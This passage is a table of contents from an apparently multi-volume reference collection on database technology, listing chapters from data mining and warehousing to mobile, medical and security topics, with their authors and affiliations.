Chapter 1.5. Pattern Mining and Clustering on Image Databases ........................................................ 60 Marinette Bouet, LIMOS, Blaise Pascal University-Clermont-Ferrand, France Pierre Gançarski, LSIIT-AFD-Louis Pasteur University, France Marie-Aude Aufaure, Supélec—INRIA, France Omar Boussaïd, University LUMIERE Lyon, France Chapter 1.6. Conceptual Modeling Solutions for the Data Warehouse ................................................ 86 Stefano Rizzi, DEIS-University of Bologna, Italy Chapter 1.7. A Literature Overview of Fuzzy Database Modeling..................................................... 105 Z. M. Ma, Northeastern University, China Chapter 1.8. Fuzzy and Probabilistic Object-Oriented Databases...................................................... 126 Tru H. Cao, Ho Chi Minh City University of Technology, Vietnam Chapter 1.9. An Overview of Fuzzy Approaches to Flexible Database Querying ............................. 135 Slawomir Zadrożny, Polish Academy of Sciences, Poland Guy de Tré, Ghent University, Belgium Rita de Caluwe, Ghent University, Belgium Janusz Kacprzyk, Polish Academy of Sciences, Poland Chapter 1.10. Distributed Data Mining............................................................................................... 157 Grigorios Tsoumakas, Aristotle University of Thessaloniki, Greece Ioannis Vlahavas, Aristotle University of Thessaloniki, Greece Chapter 1.11. Histogram-Based Compression of Databases and Data Cubes .................................... 165 Alfredo Cuzzocrea, University of Calabria, Italy Chapter 1.12. Emergence Index in Image Databases.......................................................................... 179 Sagarmay Deb, Southern Cross University, Australia Chapter 1.13. Secure Knowledge Discovery in Databases................................................................. 186 Rick L. Wilson, Oklahoma State University, USA Peter A. Rosen, University of Evansville, USA Mohammad Saad Al-Ahmadi, Oklahoma State University, USA Chapter 1.14. Indexing Textual Information....................................................................................... 196 Ioannis N. Kouris, University of Patras, Greece Christos Makris, University of Patras, Greece Evangelos Theodoridis, University of Patras, Greece Athanasios Tsakalidis, University of Patras, Greece Chapter 1.15. Database in Computing Systems.................................................................................. 205 W. Brett McKenzie, Roger Williams University, USA
Chapter 1.16. Database Integrity Checking ........................................................................................ 212 Hendrik Decker, Universidad Politécnica de Valencia, Spain Davide Martinenghi, Free University of Bozen/Bolzano, Italy Chapter 1.17. A Survey on Temporal Data Warehousing ................................................................... 221 Matteo Golfarelli, DEIS–University of Bologna, Italy Stefano Rizzi, DEIS–University of Bologna, Italy Chapter 1.18. Discovering Quality Knowledge from Relational Databases ...................................... 238 M. Mehdi Owrang O., American University, USA Chapter 1.19. Approaches to Semantics in Knowledge Management ................................................ 257 Cristiano Fugazza, University of Milan, Italy Stefano David, Polytechnic University of Marche, Italy Anna Montesanto, Polytechnic University of Marche, Italy Cesare Rocchi, Polytechnic University of Marche, Italy Chapter 1.20. Theories of Meaning in Schema Matching: A Review................................................. 282 Joerg Evermann, Memorial University of Newfoundland - St. John’s, Canada Chapter 1.21. Multi-Label Classification: An Overview .................................................................... 309 Grigorios Tsoumakas, Aristotle University of Thessaloniki, Greece Ioannis Katakis, Aristotle University of Thessaloniki, Greece Chapter 1.22. Electronic Usage Statistics ........................................................................................... 320 Patricia Hults, Rensselaer Polytechnic Institute, USA Chapter 1.23. Databases Modeling of Engineering Information ........................................................ 338 Z. M. Ma, Northeastern University, China Chapter 1.24. An Overview of Learning Object Repositories ............................................................ 362 Agiris Tzikopoulos, Agricultural University of Athens, Greece Nikos Manouselis, Agricultural University of Athens, Greece Riina Vuorikar, European Schoolnet, Belgium Chapter 1.25. An Overview of IDS Using Anomaly Detection.......................................................... 384 Lior Rokach, Ben-Gurion University of the Negev, Israel Yuval Elovici, Ben-Gurion University of the Negev, Israel Chapter 1.26. Towards Google Earth: A History of Earth Geography ............................................... 395 Hatem F. Halaoui, Haigazian University, Lebanon
Section II. Development and Design Methodologies This section provides in-depth coverage of conceptual architectures, frameworks and methodologies related to the design and implementation of database technologies. Throughout these contributions, research fundamentals in the discipline are presented and discussed. From broad examinations to specific discussions on particular frameworks and infrastructures, the research found within this section spans the discipline while also offering detailed, specific discussions. Basic designs, as well as abstract developments, are explained within these chapters, and frameworks for designing successful databases are discussed. Chapter 2.1. Design of a Data Model for Social Network Applications............................................. 414 Susanta Mitra, International Institute of Information Technology, India Aditya Bagchi, Indian Statistical Institute, India A.K.Bandyopadhyay, Jadavpur University, India Chapter 2.2. Database Design Based on B ......................................................................................... 440 Elvira Locuratolo, ISTI, Consiglio Nazionale delle Ricerche, Italy Chapter 2.3. A Database Service Discovery Model for Mobile Agents.............................................. 457 Lei Song, University of Guelph, Guelph, Canada Xining Li, University of Guelph, Guelph, Canada Jingbo Ni, University of Guelph, Guelph, Canada Chapter 2.4. A Database Project in a Small Company (or How the Real World Doesn’t Always Follow the Book) ................................................................................................................................ 468 Efrem Mallach, University of Massachusetts, Dartmouth, USA Chapter 2.5. Integrating Mobile-Based Systems with Healthcare Databases..................................... 484 Yu Jiao, Oak Ridge National Laboratory, USA Ali R. Hurson, Pennsylvania State University, USA Thomas E. Potok, Oak Ridge National Laboratory, USA Barbara G. Beckerman, Oak Ridge National Laboratory, USA Chapter 2.6. A Framework for Efficient Association Rule Mining in XML Data .............................. 505 Ji Zhang, University of Toronto, Canada Han Liu, Carnegie Mellon University, USA Tok Wang Ling, National University of Singapore, Singapore Robert M. Bruckner, Microsoft, USA A Min Tjoa, Vienna University of Technology, Austria Chapter 2.7. Conceptual Modeling for XML: A Myth or a Reality.................................................... 527 Sriram Mohan, Indiana University, USA Arijit Sengupta, Wright State University, USA
Chapter 2.8. Semantic Integrity Constraint Checking for Multiple XML Databases......................... 550 Praveen Madiraju, Marquette University, USA Rajshekhar Sunderraman, Georgia State University, USA Shamkant B. Navathe, Georgia Institute of Technology, USA Haibin Wang, Emory University, USA Chapter 2.9. Goal-Oriented Requirement Engineering for XML Document Warehouses ................. 570 Vicky Nassis, La Trobe University, Melbourne, Australia Tharam S. Dillon, University of Technology, Sydney, Australia Wenny Rahayu, La Trobe University, Australia R. Rajugan, University of Technology, Sydney, Australia Chapter 2.10. Mediating RDF/S Queries to Relational and XML Sources ........................................ 596 I. Koffina, Institute of Computer Science & University of Crete, Greece G. Serfiotis, Institute of Computer Science & University of Crete, Greece V. Christophides, Institute of Computer Science & University of Crete, Greece V. Tannen, University of Pennsylvania, USA Chapter 2.11. A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses ............................................................................................................................ 615 Maurizio Pighin, University of Udine, Italy Lucio Ieronutti, University of Udine, Italy Chapter 2.12. An MDA Compliant Approach for Designing Secure Data Warehouses ..................... 637 Rodolfo Villarroel, Universidad Católica del Maule, Chile Eduardo Fernández-Medina, Universidad de Castilla-La Mancha, Spain Juan Trujillo, Universidad de Alicante, Spain Mario Piattini, Universidad de Castilla-La Mancha, Spain Chapter 2.13. Architecture for Symbolic Object Warehouse.............................................................. 648 Sandra Elizabeth González Císaro, Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Héctor Oscar Nigro, Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Chapter 2.14. Efficient and Robust Node- Partitioned Data Warhouses............................................. 658 Pedro Furtado, Universidade de Coimbra, Portugal
Volume II Chapter 2.15. Web Data Warehousing Convergence: From Schematic to Systematic ....................... 678 D. Xuan Le, La Trobe University, Australia J. Wenny Rahayu, La Trobe University, Australia David Taniar, Monash University, Australia
Chapter 2.16. Data Warehouse Design to Support Customer Relationship Management Analysis......................................................................................................................... 702 Colleen Cunningham, Drexel University, USA Il-Yeol Song, Drexel University, USA Peter P. Chen, Louisiana State University, USA Chapter 2.17. Aspects of Intelligence in an “SP” Database System................................................... 725 J. Gerard Wolff, CognitionResearch.org.uk, UK Chapter 2.18. Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems.................................................................................................. 755 Kun-Woo Yang, Keimyung University, South Korea Soon-Young Huh, KAIST Business School, South Korea Chapter 2.19. Building an Environmental GIS Knowledge Infrastructure......................................... 778 Inya Nlenanya, Iowa State University, USA Chapter 2.20. Bug Fixing Practices within Free/Libre Open Source Software Development Teams.... 797 Kevin Crowston, Syracuse University, USA Barbara Scozzi, Politecnico di Bari, Italy Chapter 2.21. OLAP with a Database Cluster .................................................................................... 829 Uwe Röhm, University of Sydney, Australia Chapter 2.22. Extraction, Transformation, and Loading Processes.................................................... 847 Jovanka Adzic, Telecom Italia, Italy Valter Fiore, Telecom Italia, Italy Luisella Sisto, Telecom Italia, Italy Chapter 2.23. Designing Information Systems Capabilities to Create Business Value: A Theoretical Conceptualization of the Role of Flexibility and Integration....................................... 866 Christoph Schlueter Langdon, University of Southern California, USA Section III. Tools and Technologies This section presents extensive coverage of the technology that both derives from and informs databases. These chapters provide an in-depth analysis of the use and development of innumerable devices and tools, while also providing insight into new and upcoming technologies, theories, and instruments that will soon be commonplace. Within these rigorously researched chapters, readers are presented with examples of database technology. In addition, the successful implementation and resulting impact of these various technologies are discussed within this collection of chapters. Chapter 3.1. Open Source Database Technologies ............................................................................. 887 Emmanuel Udoh, Purdue University, USA Chapter 3.2. Action Research with Internet Database Tools............................................................... 894 Bruce L. Mann, Memorial University, Canada
Chapter 3.3. A Scalable Middleware for Web Databases.................................................................... 903 Athman Bouguettaya, Virginia Tech, USA Zaki Malik, Virginia Tech, USA Abdelmounaam Rezgui, Virginia Tech, USA Lori Korff, Virginia Tech, USA Chapter 3.4. Full-Text Search Engines for Databases ........................................................................ 931 László Kovács, University of Miskolc, Hungary Domonkos Tikk, Budapest University of Technology and Economics, Hungary Chapter 3.5. Application of Decision Tree as a Data mining Tool in a Manufacturing System......... 940 S. A. Oke, University of Lagos, Nigeria Chapter 3.6. Alliance Project: Digital Kinship Database and Genealogy........................................... 956 Shigenobu Sugito, Sugiyama University, Japan Sachiko Kubota, Hiroshima University, Japan Chapter 3.7. Constraint-Based Multi-Dimensional Databases ........................................................... 961 Franck Ravat, Université Toulouse I, France Olivier Teste, Université Toulouse III, France Gilles Zurfluh, Université Toulouse I, France Chapter 3.8. Towards a Visual Query System for Spatio-Temporal Databases.................................. 987 Valéria M. B. Cavalcanti, Federal University of Campina Grande, Brazil Ulrich Schiel, Federal University of Campina Grande, Brazil Claudio de Souza Baptista, Federal University of Campina Grande, Brazil Chapter 3.9. Visual Query Languages, Representation Techniques and Data Models ..................... 1003 Maria Chiara Caschera, IRPPS-CNR, Italy Arianna D’Ulizia, IRPPS-CNR, Italy Leonardo Tininini, IASI-CNR, Italy Chapter 3.10. A Formal Verification and Validation Approach for Real-Time Databases................ 1020 Pedro Fernandes Ribeiro Neto, Universidade do Estado do Rio Grande do Norte, Brazil Maria Lígia Barbosa Perkusich, Universidade Católica de Pernambuco, Brazil Hyggo Oliveira de Almeida, Federal University of Campina Grande, Brazil Angelo Perkusich, Federal University of Campina Grande, Brazil Chapter 3.11. Protoforms of Linguistic Database Summaries as a Human Consistent Tool for Using Natural Language in Data Mining .................................................................................... 1038 Janusz Kacprzyk, Polish Academy of Sciences, Poland Sławomir Zadrożny, Polish Academy of Sciences, Poland Chapter 3.12. Rapid Privacy Preserving Algorithm for Large Databases ........................................ 1050 K. Anbumani, Karunya Institute of Technology and Sciences (Deemed University), India R. Nedunchezhian, Sri Ramakrishna Engineering College, India
Chapter 3.13. A Content-Based Approach to Medical Image Database Retrieval............................ 1062 Chia-Hung Wei, University of Warwick, UK Chang-Tsun Li, University of Warwick, UK Roland Wilson, University of Warwick, UK Chapter 3.14. High Speed Optical Higher Order Neural Networks for Discovering Data Trends and Patterns in Very Large Databases .......................................................................... 1084 David R. Selviah, University College London, UK Chapter 3.15. Mobile Information Processing Involving Multiple Non-Collaborative Sources...... 1108 Say Ying Lim, Monash University, Australia David Taniar, Monash University, Australia Bala Srinivasan, Monash University, Australia Chapter 3.16. Rough Sets: A Versatile Theory for Approaches to Uncertainty Management in Databases ...................................................................................................................................... 1127 Theresa Beaubouef, Southeastern Louisiana University, USA Frederick E. Petry, Naval Research Laboratory, USA Chapter 3.17. VRMiner: A Tool for Multimedia Database Mining With Virtual Reality................. 1151 H. Azzag, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France F. Picarougne, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France C. Guinot, CE.R.I.E.S., Unité Biométrie et Epidémiologie, and Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France G. Venturini, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France Chapter 3.18. UB2SQL: A Tool for Building Database Applications Using UML and B Formal Method ....................................................................................................................... 1168 Amel Mammar, University of Luxembourg, Luxembourg Régine Laleau, University of Paris 12, France Chapter 3.19. MMIR: An Advanced Content-Based Image Retrieval System Using a Hierarchical Learning Framework ................................................................................................. 1189 Min Chen, Florida International University, USA Shu-Ching Chen, Florida International University, USA Chapter 3.20. MILPRIT*: A Constraint-Based Algorithm for Mining Temporal Relational Patterns ............................................................................................................................ 1205 Sandra de Amo, Universidade Federal de Uberlândia, Brazil Waldecir P. Junior, Universidade Federal de Uberlândia, Brazil Arnaud Giacometti, Université François Rabelais de Tours, France
Chapter 3.21. Database Benchmarks ................................................................................................ 1226 Jérôme Darmont, ERIC, University of Lyon 2, France Section IV. Utilization and Application This section introduces and discusses the ways in which information technology has been used to shape the realm of database technology and proposes new ways in which IT-related innovations can be implemented within organizations and in society as a whole. These particular selections highlight, among other topics, the implementation of mobile databases and database-driven portals. Contributions included in this section provide excellent coverage of today’s environment and insight into how database technology impacts the fabric of our present-day global village. Chapter 4.1. A Taxonomy of Database Operations on Mobile Devices ........................................... 1235 Say Ying Lim, Monash University, Australia David Taniar, Monash University, Australia Bala Srinivasan, Monash University, Australia Chapter 4.2. Transaction Management in Mobile Databases ........................................................... 1257 Ziyad Tariq Abdul-Mehdi, Multimedia University, Malaysia Ali Bin Mamat, Universiti Putra Malaysia, Malaysia Hamidah Ibrahim, Universiti Putra Malaysia, Malaysia Mustafa M. Dirs, College University Technology Tun Hussein Onn, Malaysia Chapter 4.3. Bioinformatics Web Portals.......................................................................................... 1267 Mario Cannataro, Università “Magna Græcia” di Catanzaro, Italy Pierangelo Veltri, Università “Magna Græcia” di Catanzaro, Italy Chapter 4.4. Large-Scale ASP Replication of Database-Driven Portals........................................... 1276 Christopher B. Mayer, Air Force Institute of Technology, USA K. Selçuk Candan, Arizona State University, USA Chapter 4.5. A Case Study of an Integrated University Portal.......................................................... 1285 Tracy R. Stewart, Regent University, USA Jason D. Baker, Regent University, USA Chapter 4.6. Electronic Tools for Online Assessments: An Illustrative Case Study from Teacher Education .................................................................................................................... 1291 Jon Margerum-Leys, Eastern Michigan University, USA Kristin M. Bass, University of California, Berkeley, USA Chapter 4.7. Assessment of Students by a Teacher with a Hand Held Device and a Networkable Database............................................................................................................. 1309 C. Paul Newhouse, Edith Cowan University, Australia
Chapter 4.8. An XML-Based Database for Knowledge Discovery: Definition and Implementation .......................................................................................................................... 1320 Rosa Meo, Università di Torino, Italy Giuseppe Psaila, Università di Bergamo, Italy Chapter 4.9. A Prehospital Database System for Emergency Medical Services............................... 1344 Nada Hashmi, 10Blade, Inc., USA Mark Gaynor, Boston University School of Management, USA Marissa Pepe, Boston University School of Management, USA Matt Welsh, Harvard University, USA William W. Tollefsen, Boston University School of Medicine, USA Steven Moulton, Boston University School of Medicine, USA Dan Myung, 10Blade, Inc., USA
Volume III Chapter 4.10. A Preliminary Study Toward Wireless Integration of Patient Information System ... 1357 Abdul-Rahman Al-Ali, American University of Sharjah, UAE Tarik Ozkul, American University of Sharjah, UAE Taha Landolsi, American University of Sharjah, UAE Chapter 4.11. A Web-Based Application to Exchange Electronic Health Records and Medical Images in Ophthalmology............................................................................................ 1372 Isabel de la Torre Díez, University of Valladolid, Spain Roberto Hornero Sánchez, University of Valladolid, Spain Miguel López Coronado, University of Valladolid, Spain Jesús Poza Crespo, University of Valladolid, Spain María Isabel López Gálvez, University of Valladolid, Spain Chapter 4.12. Implementation of a Computerized System in an Oncology Unit ............................. 1385 Taxiarchis Botsis, Athens Medical School, Greece Konstantinos Syrigos, Athens Medical School, Greece Chapter 4.13. Challenges in Data Mining on Medical Databases .................................................... 1393 Fatemeh Hosseinkhah, Howard University Hospital, USA Hassan Ashktorab, Howard University Hospital, USA Ranjit Veen, American University, USA M. Mehdi Owrang O., American University, USA Chapter 4.14. Beyond OpenURL: Technologies for Linking Library Resources............................. 1405 George Boston, Western Michigan University, USA Randle J. Gedeon, Western Michigan University, USA Chapter 4.15. Databases for Multiple Archaeological Excavations and Internet Applications ........ 1420 Athanasios Karamalis, Computer Scientist and Researcher, Germany
Chapter 4.16. Collaborative Information Management System for Science Domains..................... 1446 Ozgul Unal, University of Amsterdam, The Netherlands Ersin C. Kaletas, University of Amsterdam, The Netherlands Hamideh Afsarmanesh, University of Amsterdam, The Netherlands H. Hakan Yakali, University of Amsterdam, The Netherlands Louis O. Hertzberger, University of Amsterdam, The Netherlands Chapter 4.17. Computer Networking of Cybercafés in Delta State, Nigeria.................................... 1454 Oghenevwogaga Benson Adogbeji, Delta State University, Abraka, Nigeria Esharenana E. Adomi, Delta State University, Abraka, Nigeria Chapter 4.18. Ara Irititja: Towards Culturally Appropriate IT Best Practice in Remote Indigenous Australia........................................................................................................ 1462 Martin Hughes, Smart Works, Australia John Dallwitz, Ara Irititja, Pitjantjatjara Council Inc., Australia Chapter 4.19. Agreements Treaties and Negotiated Settlements Database ...................................... 1472 Marcia Langton, The University of Melbourne, Australia Odette Mazel, The University of Melbourne, Australia Lisa Palmer, The University of Melbourne, Australia Chapter 4.20. From ‘Flow’ to ‘Database’: A Comparative Study of the Uses of Traditional and Internet Television in Estonia.............................................................................. 1477 Ravio Suni, University of Tartu, Estonia Chapter 4.21. Innovative Technological Paradigms for Corporate Offshoring ................................ 1490 Tapasya Patki, GGSIP University, India A. B. Patki, Department of Information Technology, India Chapter 4.22. Out of Control? The Real ID Act of 2005 .................................................................. 1511 Todd Loendorf, North Carolina State University, USA Chapter 4.23. Factors Influencing the Lifetime of Telecommunication and Information Technology Standards: Results of an Explorative Analysis of the PERINORM Database .............. 1529 Knut Blind, Fraunhofer Institute for Systems and Innovation Research & Berlin University of Technology, Germany Chapter 4.24. Image Mining: A Case for Clustering Shoe prints ..................................................... 1552 Wei Sun, Monash University, Australia David Taniar, Monash University, Australia Torab Torabi, La Trobe University, Australia Chapter 4.25. A Data Visualization and Interpretation System for Sensor Networks ...................... 1568 Fengxian Fan, Kunming University, China Chapter 4.26. Enhancing UML Models: A Domain Analysis Approach .......................................... 1581 Iris Reinhartz-Berger, University of Haifa, Israel Arnon Sturm, Ben-Gurion University of the Negev, Israel
Section V. Organizational and Social Implications This section includes a wide range of research pertaining to the social and organizational impact of database technology around the world. Chapters in this section analyze online databases, data security, and organizational decision support. The inquiries and methods presented in this section offer insight into the implications of database technology at both a personal and organizational level, while also emphasizing potential areas of study within the discipline. Chapter 5.1. A Knowledge Integration Approach for Organizational Decision Support.................. 1604 Kee-Young Kwahk, Kookmin University, Korea Hee-Woong Kim, National University of Singapore, Singapore Hock Chuan Chan, National University of Singapore, Singapore Chapter 5.2. The Knowledge Transfer Process: From Field Studies to Technology Development ..................................................................................................................................... 1622 M. Millie Kwan, University of Hong Kong, Pokfulam, Hong Kong Pak-Keung Cheung, University of Hong Kong, Pokfulam, Hong Kong Chapter 5.3. The Critical Role of Information Processing in Creating an Effective Knowledge Organization ................................................................................................................. 1638 William R. King, University of Pittsburgh, USA Chapter 5.4. Interesting Knowledge Patterns in Databases .............................................................. 1652 Rajesh Natarajan, Indian Institute of Management Lucknow (IIML), India B. Shekar, Indian Institute of Management Bangalore (IIMB), India Chapter 5.5. Fine-Grained Data Security in Virtual Organizations .................................................. 1663 Harith Indraratne, Budapest University of Technology and Economics, Hungary Gábor Hosszú, Budapest University of Technology and Economics, Hungary Chapter 5.6. Knowledge Communication with Shared Databases ................................................... 1670 Joachim Kimmerle, University of Tuebingen, Germany Ulrike Cress, Knowledge Media Research Center, Germany Chapter 5.7. Economic Development: Government’s Cutting Edge in IT ....................................... 1682 Gerald A. Merwin Jr., Valdosta State University, USA J. Scott McDonald, University of Texas El Paso, USA Levy C. Odera, University of Florida, USA Chapter 5.8. A Comprehensive Framework Towards Information Sharing Between Government Agencies....................................................................................................................... 1723 Akhilesh Bajaj, The University of Tulsa, USA Sudha Ram, The University of Arizona, USA Chapter 5.9. A GIS-Based Interactive Database System for Planning Purposes .............................. 1741 Nedal Al-Hanbali, Al-Balqa’ Applied University, Jordan Balqies Sadoun, Al-Balqa’ Applied University, Jordan
Chapter 5.10. Categorizing Post-Deployment IT Changes: An Empirical Investigation ................. 1756 David Kang, Chapman University, USA Chapter 5.11. Customer Relationship Management and Knowledge Discovery in Database.......... 1778 Jounghae Bang, Kookmin University, Korea Nikhilesh Dholakia, University of Rhode Island, USA Lutz Hamel, University of Rhode Island, USA Seung-Kyoon Shin, University of Rhode Island, USA Chapter 5.12. Customer Investigation Process at Credit Suisse: Meeting the Rising Demands of Regulators ......................................................................................................... 1787 Daniel Maier, Credit Suisse, Switzerland Thomas Muegeli, Credit Suisse, Switzerland Andrea Krejza, Credit Suisse, Switzerland Chapter 5.13. Metaphors and Models for Data Mining Ethics ......................................................... 1808 Peter Danielson, University of British Columbia, Canada Chapter 5.14. Reconciling Information Privacy and Information Access in a Globalized Technology Society ........................................................................................................ 1823 George T. Duncan, Carnegie Mellon University, USA Stephen F. Roehrig, Carnegie Mellon University, USA Chapter 5.15. Context-Aware Query Processing in Ad-Hoc Environments of Peers ....................... 1844 Nikolaos Folinas, University of Ioannina, Greece Panos Vassiliadis, University of Ioannina, Greece Evaggelia Pitoura, University of Ioannina, Greece Evangelos Papapetrou, University of Ioannina, Greece Apostolos Zarras, University of Ioannina, Greece Chapter 5.16. Misuse of Online Databases for Literature Searches ................................................. 1867 Robert A. Bartsch, University of Houston - Clear Lake, USA Section VI. Managerial Impact This section presents contemporary coverage of the managerial implications of database technology. Particular contributions address e-services, database grids, and project databases. The managerial research provided in this section allows executives, practitioners, and researchers to gain a better sense of how database technology can inform their practices and behavior. Chapter 6.1. Conflicts, Compromises, and Political Decisions: Methodological Challenges of Enterprise-Wide E-Business Architecture Creation................................................... 1876 Kari Smolander, Lappeenranta University of Technology, Finland Matti Rossi, Helsinki School of Economics, Finland
Chapter 6.2. Database High Availability: An Extended Survey ....................................................... 1899 Moh’d A. Radaideh, Abu Dhabi Police – Ministry of Interior, United Arab Emirates Hayder Al-Ameed, United Arab Emirates University, United Arab Emirates Chapter 6.3. Database Integration in the Grid Infrastructure............................................................ 1928 Emmanuel Udoh, Indiana University – Purdue University, USA Chapter 6.4. Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations................................................................................................. 1936 Fiona Fui-Hoon Nah, University of Nebraska-Lincoln, USA Zahidul Islam, Independent University, Bangladesh Mathew Tan, Agilent Technologies, Malaysia Chapter 6.5. Business Information Integration from XML and Relational Databases Sources ....... 1959 Ana María Fermoso Garcia, Pontifical University of Salamanca, Spain Roberto Berjón Gallinas, Pontifical University of Salamanca, Spain Chapter 6.6. A Parallel Methodology for Reduction of Coupling in Distributed Business-to-Business E-Commerce Transactions............................................................................. 1984 Anthony Mark Orme, Athens State University, USA Letha H. Etzkorn, University of Alabama, USA Chapter 6.7. A Two-Stage Zone Regression Method for Global Characterization of a Project Database ........................................................................................................................ 2000 J. J. Dolado, University of the Basque Country, Spain D. Rodríguez, University of Reading, UK J. Riquelme, University of Seville, Spain F. Ferrer-Troyano, University of Seville, Spain J. J. Cuadrado, University of Alcalá de Henares, Spain
Volume IV Section VII. Critical Issues This section addresses conceptual and theoretical issues related to the field of database technology, which include security issues in numerous facets of the discipline including security within medical and web-powered. Within these chapters, the reader is presented with analysis of the most current and relevant conceptual inquires within this growing field of study. Particular chapters also address quality of service issues in information quality, data cleaning, and data classification. Overall, contributions within this section ask unique, often theoretical questions related to the study of database technology and, more often than not, conclude that solutions are both numerous and contradictory. Chapter 7.1. NetCube: Fast, Approximate Database Queries Using Bayesian Networks ................ 2011 Dimitris Margaritis, Iowa State University, USA Christos Faloutsos, Carnegie Mellon University, USA Sebastian Thrun, Stanford University, USA
Chapter 7.2. Approximate Range Querying over Sliding Windows................................................. 2037 Francesco Buccafurri, University “Mediterranea” of Reggio Calabria, Italy Gianluca Caminiti, University “Mediterranea” of Reggio Calabria, Italy Gianluca Lax, University “Mediterranea” of Reggio Calabria, Italy Chapter 7.3. Consistent Queries over Databases with Integrity Constraints .................................... 2051 Luciano Caroprese, DEIS Universitá della Calabria, Italy Cristian Molinaro, DEIS Universitá della Calabria, Italy Irina Trubitsyna, DEIS Universitá della Calabria, Italy Ester Zumpano, DEIS Universitá della Calabria, Italy Chapter 7.4. A Deterministic Approach to XML Query Processing with Efficient Support for Pure and Negated Containments ................................................................................................. 2059 Dunren Che, Illinois University at Carbondale, USA Chapter 7.5. Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals ................................................................................................................................ 2079 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.6. Compiling Medical Data into National Medical Databases: Legitimate Practice or Data Protection Concern?............................................................................. 2085 Boštjan Berčič, Institute for Economics, Law and Informatics, Ljubljana, Slovenia Carlisle George, Middlesex University, UK Chapter 7.7. Database Security and Statistical Database Security ................................................... 2100 Edgar R. Weippl, Secure Business Austria, Austria Chapter 7.8. Security Threats in Web-Powered Databases and Web Portals.................................... 2109 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.9. SQL Code Poisoning: The Most Prevalent Technique for Attacking Web Powered Databases ................................................................................................................... 2118 Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.10. Sanitization and Anonymization of Document Repositories ..................................... 2129 Yücel Saygin, Sabanci University, Turkey Dilek Hakkani-Tür, AT&T Labs—Research, USA Gökhan Tür, AT&T Labs—Research, USA Chapter 7.11. Information Quality: How Good are Off-the-shelf DBMs? ....................................... 2140 Felix Naumann, Humboldt-Universität zu Berlin, Germany Mary Roth, IBM Silicon Valley Lab, USA
Chapter 7.12. Handling Fuzzy Similarity for Data Classification .................................................... 2157 Roy Gelbard, Bar-Ilan University, Israel Avichai Meged, Bar-Ilan University, Israel Chapter 7.13. Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance ........ 2166 Yan Chen, Louisiana State University Agricultural Center, USA Graham H. Rong, Massachusetts Institute of Technology, USA Jianhua Chen, Louisiana State University, USA Chapter 7.14. Mining for Mutually Exclusive Items in Transaction Databases ............................... 2192 George Tzanis, Aristotle University of Thessaloniki, Greece Christos Berberidis, Aristotle University of Thessaloniki, Greece Chapter 7.15. Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data.................................................................................................... 2204 Tran Khanh Dang, National University of Ho Chi Minh City, Vietnam Chapter 7.16. A Multiple-Bits Watermark for Relational Data......................................................... 2223 Yingjiu Li, Singapore Management University, Singapore Huiping Guo, California State University at Los Angeles, USA Shuhong Wang, University of Wollongong, Australia Chapter 7.17. A Machine Learning Approach to Data Cleaning in Databases and Data Warehouses ........................................................................................................................ 2245 Hamid Haidarian Shahri, University of Maryland, USA Chapter 7.18. A Roadmap on Updates .............................................................................................. 2261 Fernando Zacarías Flores, Benemérita Universidad Autónoma de Puebla, Mexico Dionicio Zacarías Flores, Benemérita Universidad Autónoma de Puebla, Mexico Rosalba Cuapa Canto, Benemérita Universidad Autónoma de Puebla, Mexico Luis Miguel Guzmán Muñoz, Benemérita Universidad Autónoma de Puebla, Mexico Chapter 7.19. Association Rule Hiding Methods.............................................................................. 2268 Vassilios S. Verykios, University of Thessaly, Greece Chapter 7.20. Managing Uncertainties in Image Databases ............................................................. 2275 Antonio Picariello, University of Napoli, Italy Maria Luisa Sapino, University of Torino, Italy Chapter 7.21. Bitmap Join Indexes vs. Data Partitioning ................................................................. 2292 Ladjel Bellatreche, Poitiers University, France Chapter 7.22. Integrating Projects from Multiple Open Source Code Forges.................................. 2301 Megan Squire, Elon University, USA
Chapter 7.23. Extended Action Rule Discovery Based on Single Classification Rules and Reducts....................................................................................................................................... 2313 Zbigniew W. Ras, University of North Carolina at Charlotte, USA Elzbieta M. Wyrzykowska, University of Information Technology and Management, Poland Chapter 7.24. Optimization of Multidimensional Aggregates in Data Warehouses ......................... 2324 Russel Pears, Auckland University of Technology, New Zealand Bryan Houliston, Auckland University of Technology, New Zealand Chapter 7.25. Improving Storage Concepts for Semantic Models and Ontologies .......................... 2348 Edgar R. Weippl, Vienna University of Technology, Austria Markus D. Klemen, Vienna University of Technology, Austria Stefan Raffeiner, Vienna University of Technology, Austria Section VIII. Emerging Trends This section highlights research potential within the field of database technology while exploring uncharted areas of study for the advancement of the discipline. Chapters within this section highlight evolutions in knowledge discovery, data integration, and models that inform database technology. These contributions, which conclude this exhaustive, multi-volume set, provide emerging trends and suggestions for future research within this rapidly expanding discipline. Chapter 8.1. From Databases to Ontologies ..................................................................................... 2360 Guntis Barzdins, University of Latvia, Latvia Janis Barzdins, University of Latvia, Latvia Karlis Cerans, University of Latvia, Latvia Chapter 8.2. A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web......................................................................................................................... 2384 Henry M. Kim, York University, Canada Arijit Sengupta, Wright State University, USA Mark S. Fox, University of Toronto, Canada Mehmet Dalkilic, Indiana University, USA Chapter 8.3. Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies ...................................................................................................................... 2405 Vania Bogorny, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil, and Transnational University of Limburg, Belgium Paulo Martins Engel, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil Luis Otavio Alavares, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil Chapter 8.4. A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases.................................................................................................................... 2427 Wai-Ho Au, Microsoft Corporation, USA,
